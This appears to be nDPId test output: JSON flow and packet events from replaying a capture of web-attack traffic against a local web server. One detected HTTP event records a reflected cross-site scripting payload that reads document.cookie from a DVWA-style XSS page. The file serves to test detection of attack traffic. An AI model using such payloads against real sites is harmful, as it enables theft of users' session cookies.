+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":2,"flow_last_seen":1499347542648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ48Js\/FwIj7fINqAScSBRdQAAAgQFtAQCCAoD5OrfATsZagEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":3,"flow_last_seen":1499347542649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347542649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00WBAAD4G9HesEAABwKgKMuPCAFCPt8g2bPxcCYAQAOXwfAAAAQEICgE7GWoD5Orf"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347545176,"flow_last_seen":1499347545176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347545176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1499347545176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HVZAAD4GqHqsEAABwKgKMuPcAFAahQa0AAAAAKACchA8gQAAAgQFtAQCCAoBOxviAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":1499347545176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ49weXgmaGoUGtaAScSAkLAAAAgQFtAQCCAoD5O1XATsb4gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":3,"flow_last_seen":1499347545177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347545177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HVdAAD4GqIGsEAABwKgKMuPcAFAahQa1Hl4Jm4AQAOXDMwAAAQEICgE7G+ID5O1X"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347546427,"flow_last_seen":1499347546427,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4827,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1499347546427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q6tAAD4GgiWsEAABwKgKMuPqAFBqhV6wAAAAAKACchCTPQAAAgQFtAQCCAoBOx0bAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4828,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":2,"flow_last_seen":1499347546428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347546428,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4+qNxgXIaoVesaAScSAOGQAAAgQFtAQCCAoD5O6QATsdGwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4829,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":3,"flow_last_seen":1499347546428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347546428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q6xAAD4GgiysEAABwKgKMuPqAFBqhV6xjcYFyYAQAOWtIAAAAQEICgE7HRsD5O6Q"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347417243,"flow_last_seen":1499347422731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347418519,"flow_last_seen":1499347423606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347421069,"flow_last_seen":1499347426732,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4836,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":320,"flow_first_seen":1499347355229,"flow_last_seen":1499347423381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232389,"flow_avg_l4_payload_len":726,"midstream":0,"thread_ts_msec":1499347546763,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347547687,"flow_last_seen":1499347547687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347547687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4839,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1499347547687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89IlAAD4G0UasEAABwKgKMuP4AFDYf+rfAAAAAKACchCXygAAAgQFtAQCCAoBOx5WAAAAAAEDAwc="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":2,"flow_last_seen":1499347547687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347547687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4\/gRtWE22H\/q4KAScSAyDgAAAgQFtAQCCAoD5O\/LATseVgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":3,"flow_last_seen":1499347547688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347547688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09IpAAD4G0U2sEAABwKgKMuP4AFDYf+rgEbVhN4AQAOXRFQAAAQEICgE7HlYD5O\/L"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347550209,"flow_last_seen":1499347550209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347550209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1499347550209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eyFAAD4GSq+sEAABwKgKMuQSAFDq3lvtAAAAAKACchARzgAAAgQFtAQCCAoBOyDMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":2,"flow_last_seen":1499347550209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347550209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5BLEGGHa6t5b7qAScSD2kwAAAgQFtAQCCAoD5PJBATsgzAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4859,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":3,"flow_last_seen":1499347550210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347550210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eyJAAD4GSrasEAABwKgKMuQSAFDq3lvuxBhh24AQAOWVmwAAAQEICgE7IMwD5PJB"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347551495,"flow_last_seen":1499347551495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347551495,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1499347551495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551495,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D\/NAAD4Gtd2sEAABwKgKMuQgAFDTqC39AAAAAKACchBVpAAAAgQFtAQCCAoBOyIOAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":2,"flow_last_seen":1499347551496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347551496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5CCgVV5k06gt\/qAScSBgYQAAAgQFtAQCCAoD5PODATsiDgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":3,"flow_last_seen":1499347551496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347551496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D\/RAAD4GteSsEAABwKgKMuQgAFDTqC3+oFVeZYAQAOX\/aAAAAQEICgE7Ig4D5POD"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347547687,"flow_last_seen":1499347551497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347551497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27MRVS1VO9FLO4CFA5FLJ13I9GULOFH69WHOJQ0PH0OKE2FMG3MQ%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347552736,"flow_last_seen":1499347552736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347552736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1499347552736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8B91AAD4GvfOsEAABwKgKMuQuAFCEqySZAAAAAKACchCswQAAAgQFtAQCCAoBOyNEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":1499347552736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347552736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5C6xPoYyhKskmqAScSB9kQAAAgQFtAQCCAoD5PS5ATsjRAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":1499347552737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347552737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0B95AAD4GvfqsEAABwKgKMuQuAFCEqySasT6GM4AQAOUcmQAAAQEICgE7I0QD5PS5"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347555255,"flow_last_seen":1499347555255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347555255,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1499347555255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81HxAAD4G8VOsEAABwKgKMuRIAFCgOPHGAAAAAKACchDBdgAAAgQFtAQCCAoBOyW6AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":2,"flow_last_seen":1499347555255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347555255,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5EiyOWdGoDjxx6AScSCtwQAAAgQFtAQCCAoD5PcvATslugEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4903,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":3,"flow_last_seen":1499347555256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347555256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01H1AAD4G8VqsEAABwKgKMuRIAFCgOPHHsjlnR4AQAOVMyQAAAQEICgE7JboD5Pcv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4912,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347556523,"flow_last_seen":1499347556523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556523,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
